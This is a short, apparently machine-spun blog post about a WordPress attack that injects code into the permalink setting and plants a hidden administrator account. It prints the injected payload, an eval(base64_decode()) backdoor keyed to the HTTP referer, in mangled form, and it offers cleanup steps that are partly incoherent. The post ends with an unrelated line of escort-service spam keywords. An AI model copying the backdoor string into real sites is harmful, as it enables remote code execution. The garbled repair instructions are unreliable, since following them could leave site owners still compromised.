WordPress SQL Injection: Ultimate Attack


A recent SQL attack hits many sites where code is inserted into your site. This MySQL injection affects your permalinks and renders them ineffective. As a result, the URLs of your blog posts will not work. Numerous WordPress blogs have been attacked in this attack thanks to Andy Soward, who has caught our attention.

As a result of this attack, one of the following codes is added to its permalink structure:


% & ({$ {eval (base64_decode ($ _ SERVER (HTTP_REFERER)))}} |. +) &%


These quotes contain all the permalinks on your site and can only be changed if they are removed manually.

Go to: to fix this

Settings> Permalinks and delete the code above and replace your default code.

Then go to the user. You will see that there is more than one administrator. You won't see your name on the list, but you will see an increase in the number. Therefore, you should look at all users and find the last one registered. Scroll over this user and get the link. Change userid = code by entering this number 1 Add. If the last user you see is using 2 was added 1 add and do it 3, You should find that the hidden administrator has strange name code. Delete the code and make it a subscriber. Then go back and delete it.

This should solve the problem. You can also remove it simply by going to your PHPMyAdmin. Because you see the user there.

We just wanted to publish this news as soon as possible so that our users can update it. Make sure your blog is not infected. We hope that WordPress will be released soon.

If you have not implemented any of these measures to protect your WordPress administration area.

escort malatya escort bursa escort antalya escort konya mersin escort